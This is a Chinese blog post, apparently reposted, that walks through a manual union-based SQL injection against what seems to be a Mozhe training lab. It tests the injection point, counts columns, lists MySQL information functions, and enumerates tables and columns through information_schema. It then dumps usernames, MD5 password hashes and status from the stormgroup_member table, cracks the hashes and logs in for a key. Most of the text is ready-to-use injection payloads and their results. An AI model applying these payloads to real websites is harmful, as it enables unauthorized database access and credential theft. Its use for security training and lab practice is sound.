手工注入流程

时间：2018-12-06 22:49:50 阅读：261 评论：0 收藏：0 [点我收藏+]

标签：word md5 思路用户查看登录系统版本连接数 pass

sql注入思路：

1. id=1 正常

id=1‘ 错误

and 1=1 and 1=2

说明存在数字型注入

2、猜字段数

union select 1

union select 1,2

....

union select 1,2,3,4 返回正常页面

说明该表中有4个字段

3.查询相关内容

位置插入的预设函数；

user() 查看用户

database() --查看数据库名称

version() --查看数据库版本

@@datadir --数据库路径

@@version_compile_os--操作系统版本

system_user() --系统用户名

current_user()--当前用户名

session_user()--连接数据库的用户名

id=-1 union select 1,2,database(),4

得到数据库名为mozhe_discuz_stormgroup

查询数据库mozhe_discuz_stormgroup中的表

id=-1 union select 1,2,group_concat(table_name),4 from information_schema.tables where table_schema=‘mozhe_discuz_stormgroup‘

得到stormgroup_member,notice

查看stormgroup_member字段：

id=-1 union select 1,2,group_concat(column_name),4 from information_schema.columns where table_name=‘stormgroup_member‘

id,name,password,status

查看notice 字段：

id=-1 union select 1,2,group_concat(column_name),4 from information_schema.columns where table_name=‘notice‘

id,title,content,time

我们要的数据在stormgroup_member表里面：

id=-1 union select 1,concat(name，password),4 from stormgroup_member

查询数据

id=-1 union select 1,concat(name,‘-‘,password,‘-‘,status),3,4 from stormgroup_member

密码 md5 解密：

登录系统得到key

手工注入流程

标签：word md5 思路用户查看登录系统版本连接数 pass

原文地址：https://www.cnblogs.com/WhiteHatKevil/p/10080090.html

踩

(0)

评论一句话评论（0）

分享档案

更多>

2021年07月29日 (22)
2021年07月28日 (40)
2021年07月27日 (32)
2021年07月26日 (79)
2021年07月23日 (29)
2021年07月22日 (30)
2021年07月21日 (42)
2021年07月20日 (16)
2021年07月19日 (90)
2021年07月16日 (35)

周排行